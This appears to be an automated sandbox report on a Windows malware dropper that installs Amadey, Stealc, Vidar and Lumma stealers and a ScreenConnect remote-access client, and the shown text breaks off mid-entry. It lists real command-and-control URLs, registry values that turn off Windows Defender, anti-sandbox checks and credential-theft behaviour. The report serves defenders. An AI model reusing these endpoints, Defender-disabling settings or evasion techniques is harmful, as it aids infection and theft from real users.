Analysis
  max time kernel: 144s
  max time network: 153s
  platform: windows10-2004_x64
  resource: win10v2004-20241007-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 19-12-2024 15:11
Static task: static1
Behavioral task: behavioral1
  Sample: 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe
  Resource: win10v2004-20241007-en
General
  Target: 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe
  Size: 6.9MB
  MD5: 1f5c25503402f436f0d752b9e3b86fdd
  SHA1: ba1469c11b2d6f5db52c4e362d31f076d37af680
  SHA256: 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c
  SHA512: b423e999fe3276b9820331c261a6fc7bf099d619f3f990eeb3f6859e86370f4202cf743a0d9063ef827a14ccb3e4cc72ac0baf96fb54d8e5262ebd897865e330
  SSDEEP: 196608:xgQSdVr3RyxoLCWj5sn5SElnBthIxQhAGQbahypEFlLzo:xRMrhyyun5bnBthINGQWg2f
Malware Config
  Extracted: amadey
    4.42
    9c9aa5
    http://185.215.113.43
    install_dir: abc3bc1985
    install_file: skotes.exe
    strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
    url_paths: /Zu7JuNko/index.php
  Extracted: lumma
  Extracted: stealc
    stok
    http://185.215.113.206
    url_path: /c4becf79229cb002.php
Signatures

Amadey family

Detect Vidar Stealer (3 IoCs)
  resource | yara_rule
  behavioral1/files/0x000c000000023bfb-140.dat | family_vidar_v7
  behavioral1/memory/4980-144-0x0000000000400000-0x0000000000639000-memory.dmp | family_vidar_v7
  behavioral1/memory/4980-315-0x0000000000400000-0x0000000000639000-memory.dmp | family_vidar_v7
Lumma family

  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 4Z894j.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 4Z894j.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 4Z894j.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 4Z894j.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 4Z894j.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
Stealc family

Vidar family

Enumerates VirtualBox registry keys (2 TTPs, 1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | 1a713a333e.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 12 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1a50E5.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4Z894j.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1a713a333e.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2b2046.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 3K21A.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 36599ddf00.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid | Process
  2880 | powershell.exe
  376 | powershell.exe
Downloads MZ/PE file
Sets service image path in registry (2 TTPs, 1 IoC)
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=f31bb2f9-de3c-4da2-bc83-b8e281547b2d&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAbIpSpj7TWkCJ0IL7CCDWtAAAAAACAAAAAAAQZgAAAAEAACAAAABvzX60sbULbdZHzwh3cVwRWyWZDQ4zm6p%2bLBT6%2f%2f%2b8eAAAAAAOgAAAAAIAACAAAAAGeFurI8IIbajOnamd6DIp7hH0AePSV5NmzdKaw4xsqKAEAABlLk8HheXNfcrc%2fEX1X8DdLTm4j6QmMctku0nqQ%2blMdT9dazpTU74eP3Fl%2fXrQCsrgentTNT%2b%2bH63m4mCuV9q%2b1ThplyRQ2zdTCNO%2fOCSRaUK9HwJPT5BH5YOuPnqUuOtCe22DMgesvIH6%2bCIlQg81HIMET%2btrhqX%2bopOfMra9QooVVx%2bV1ZDx%2bJvMJCugUPE%2fPElu9KT4L1zb%2fFDppfovvSpZYCDOlXys5AAzYEb3DpAZtqmf%2bshgKX52u%2fh2XXcK7CL9LUw2yqvtKeM4p3fIWdSEmoXwvAoxDxw2Ol2szC%2fo1z4rdgm5yqNuFPPF7Nu07EEpxoG2OnT9VzzZ6cTDVn8yHEvGL4zXwYdoOmSF7Pm%2bDpu%2bMPKAWCnLNp9%2bvr%2f8HvArAAR92J1Y8Riv%2b5uTQwtjiRO0J%2fw3xJ1BBq7TqaEAZ2sGAW8khQviZHGkxVLXKx%2f8gT6rD4YrExa3o%2bzj7SC04o5MQy9szJpxIPT%2bxqK5nBJwQiP49JiwGzAM7Bpko6nFV95CvzxpWdfzBBoLnjBddu7WRKbaQqOwIWKl05gbcNNXTDYyjQX1wdqU77JYMe2y%2fweZ%2bMh0gWMD4WZgQxkY9IQaW9FtGbzvukKZRBWI4r5KQMBnAdEgKFOCo9EpSSZwczkQDTWxeKfkYvREEi7ZFOpHdKW4BWFbEpR6o0v6VsA4YTlIaCXZNxx4yb4uFdM4Qr7lWfOibEXNrF5NV67TOggC56QsCjHBzROGhgozO9yJH9a6TCfdlG%2f51L4jaQS%2bpJuVCxYzF6Pve0Wcwdgw6IZxRxbkIsPxgxyb648ifjxO1zqNTZK1RdHtn99%2fJPHCkkfMp9HwYQ4LwIxkw0P%2b%2bkjBiJ4%2f0uODbfJ5uNeeCAT6UP4OefInFay1kA%2fYPrRo0nkuhk58ThpGf2uotabwuuIlsdKuay%2fpox%2bbNB1RkFT4rwI9sdzY2sVI5DZ%2bISq36luGwP%2b%2bVUM1bvWuh9eRT6jixpY2iu%2floWnW
fihejftNd7c%2fy0a8hSTZpz096MfQ6bGpE%2felXNEiEEISFbouBseQlNXRnEOd3vcSrdzVCkI273CE8g7CBoI%2f3%2f0odtG9BYZEJB7Q%2bjkI3N7BbYupuKito%2bKLszJEX4LEe%2f8t3poEYwrDARkDV8DDb6%2f0p33KPzS7bJtLdGE6yscyLxN9nlHDPmotc6adlLzVG2gBV%2fjlo%2bCkTtSJypdfPiRXS1EE9GJL3M4eP4dmDcHdDOZo0X6tIhuJyv4gO336jRUphWBcCL7j3ND2jtS9BdgsspQFhR%2bRNtgBEBA1vzdynrNloxD0Up3j39Tpo%2fT2s6%2brIxyJWwPWq9oP2kmrgTRMRkqjGx1coJLgdD1Wt2jUi8LOIwq0xW8Uu6mXwoVgLHsvRc8Otl%2bQFT0rYJYQT7sEwYQPr%2faac2G2AkSWM0Qn32X6JzJGCfIEPpk4vdtRe1734O8%2byV7hRSKFHE1tTxy0fLgkfA6vXNfGjKeI4dWBUWRnHZjEIHo8D1qYEbatShGtyDfqLl2PLymdPuuCw5DDfss3h6tRMbeGwZ5V6cjJdgSAsX3MI1AioFjxwecIl0AAAADeZYOJecn%2bmn7HcD5dthuiC2Q%2bBHubDW1MfGyQTY97jDgU%2bfLNzaQkgjDwNPFsA4OYZIbLEul7Y1inF6%2fyrN%2bH&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry (2 TTPs, 24 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3K21A.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4Z894j.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 36599ddf00.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1a50E5.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 36599ddf00.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3K21A.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4Z894j.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1a713a333e.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1a713a333e.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2b2046.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2b2046.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1a50E5.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
Checks computer location settings (2 TTPs, 6 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | NN9Dd7c.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | 746f41769d294a238d0d787c1fb39ef6.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | 3302d26666d341748cb9b86600ad2546.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | ga70pjP.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | 1a50E5.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | skotes.exe

Event Triggered Execution: Component Object Model Hijacking (1 TTPs)
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE (23 IoCs)
  pid | Process
  2208 | u5u31.exe
  2744 | M2G14.exe
  4640 | 1a50E5.exe
  1804 | skotes.exe
  5100 | 2b2046.exe
  5068 | skotes.exe
  1876 | NN9Dd7c.exe
  4980 | 3302d26666d341748cb9b86600ad2546.exe
  1720 | 746f41769d294a238d0d787c1fb39ef6.exe
  216 | b61f5c2478.exe
  1956 | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  4624 | b61f5c2478.exe
  3716 | skotes.exe
  6488 | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  6348 | 3K21A.exe
  4960 | 4Z894j.exe
  5876 | ga70pjP.exe
  4080 | ScreenConnect.ClientService.exe
  6564 | ScreenConnect.WindowsClient.exe
  6992 | ScreenConnect.WindowsClient.exe
  5328 | 36599ddf00.exe
  2184 | skotes.exe
  5152 | 1a713a333e.exe
Identifies Wine through registry keys (2 TTPs, 12 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 1a50E5.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 2b2046.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 3K21A.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 1a713a333e.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 4Z894j.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 36599ddf00.exe
  Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
Loads dropped DLL (22 IoCs)
  pid | Process
  5720 | MsiExec.exe
  5256 | rundll32.exe (9 entries)
  5516 | MsiExec.exe
  5368 | MsiExec.exe
  4080 | ScreenConnect.ClientService.exe (10 entries)

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk, where infostealers will often target it.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Unsecured Credentials: Credentials In Files (1 TTPs)
Steals credentials from unsecured files.
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 4Z894j.exe
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 3 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | u5u31.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | M2G14.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only), by msiexec.exe, twice for each of the following drive roots (46 entries in total):
  \??\A:, \??\B:, \??\E:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z:
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow | ioc
  50 | raw.githubusercontent.com
  51 | raw.githubusercontent.com
  52 | raw.githubusercontent.com
Boot or Logon Autostart Execution: Authentication Package (1 TTPs, 1 IoC)
Suspicious Windows Authentication Registry Modification.
  description | ioc | Process
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | msiexec.exe
  (The value is a UTF-16LE multi-string; it decodes to "msv1_0" followed by "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll", i.e. the ScreenConnect DLL is registered alongside the default LSA authentication package.)
Drops file in System32 directory (3 IoCs)
  description | ioc | Process
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\0hixpbwt.tmp | ScreenConnect.ClientService.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\0hixpbwt.newcfg | ScreenConnect.ClientService.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log | ScreenConnect.WindowsClient.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (12 IoCs)
  pid | Process
  4640 | 1a50E5.exe
  1804 | skotes.exe
  5100 | 2b2046.exe
  5068 | skotes.exe
  1956 | JQY6PX392UESHKN5CCVSO6ZYV061P.exe
  3716 | skotes.exe
  6488 | 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe
  6348 | 3K21A.exe
  4960 | 4Z894j.exe
  5328 | 36599ddf00.exe
  2184 | skotes.exe
  5152 | 1a713a333e.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 216 set thread context of 4624 | 216 | b61f5c2478.exe | 122
Drops file in Program Files directory (19 IoCs)
  description | ioc | Process
  File created, by msiexec.exe, under C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ :
  ScreenConnect.Client.dll
  ScreenConnect.WindowsClient.exe
  Client.en-US.resources
  ScreenConnect.WindowsBackstageShell.exe
  ScreenConnect.WindowsFileManager.exe
  ScreenConnect.WindowsFileManager.exe.config
  ScreenConnect.ClientService.dll
  ScreenConnect.Core.dll
  ScreenConnect.Windows.dll
  ScreenConnect.WindowsClient.exe.config
  ScreenConnect.WindowsCredentialProvider.dll
  app.config
  Client.Override.resources
  ScreenConnect.WindowsAuthenticationPackage.dll
  ScreenConnect.WindowsBackstageShell.exe.config
  ScreenConnect.ClientService.exe
  Client.Override.en-US.resources
  Client.resources
  system.config

Drops file in Windows directory (14 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
  File opened for modification | C:\Windows\Installer\ | msiexec.exe
  File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSI8E0.tmp | msiexec.exe
  File created | C:\Windows\Installer\e590807.msi | msiexec.exe
  File created | C:\Windows\Tasks\skotes.job | 1a50E5.exe
  File created | C:\Windows\Installer\e590805.msi | msiexec.exe
  File opened for modification | C:\Windows\Installer\e590805.msi | msiexec.exe
  File created | C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} | msiexec.exe
  File created | C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi | MsiExec.exe
  File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSI900.tmp | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSIA97.tmp | msiexec.exe
  File created | C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon | msiexec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (2 IoCs)
  pid | pid_target | Process | procid_target
  6620 | 5328 | WerFault.exe | 143
  5468 | 5328 | WerFault.exe | 143
System Location Discovery: System Language Discovery (1 TTPs, 27 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by each of the following processes (27 entries in total):
  2b2046.exe, NN9Dd7c.exe, ScreenConnect.ClientService.exe, 1a713a333e.exe, 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe, u5u31.exe, MsiExec.exe, 36599ddf00.exe, M2G14.exe, 1a50E5.exe, skotes.exe, 3302d26666d341748cb9b86600ad2546.exe, MsiExec.exe, powershell.exe, 3K21A.exe, msiexec.exe, JQY6PX392UESHKN5CCVSO6ZYV061P.exe, cmd.exe, powershell.exe, b61f5c2478.exe, 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe, ga70pjP.exe, rundll32.exe, 4Z894j.exe, MsiExec.exe, timeout.exe, b61f5c2478.exe
Checks SCSI registry key(s) (3 TTPs, 5 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = [value not present on the page] | vssvc.exe
  Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | vssvc.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | vssvc.exe
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3302d26666d341748cb9b86600ad2546.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3302d26666d341748cb9b86600ad2546.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 728 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted 